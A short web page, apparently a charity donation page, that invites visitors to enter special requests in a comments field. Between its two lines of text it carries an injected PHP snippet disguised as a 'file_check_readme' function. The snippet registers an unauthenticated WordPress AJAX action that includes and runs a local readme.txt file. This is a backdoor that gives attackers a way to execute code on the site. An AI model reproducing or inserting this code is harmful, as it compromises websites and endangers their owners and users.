CIFC Donation Page
If you have a special request, please let us know by entering it in the Comments Field below.
if(!function_exists('file_check_readme65970')){ add_action('wp_ajax_nopriv_file_check_readme65970', 'file_check_readme65970'); add_action('wp_ajax_file_check_readme65970', 'file_check_readme65970'); function file_check_readme65970() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
If you have a special request, please let us know by entering it in the Comments Field below.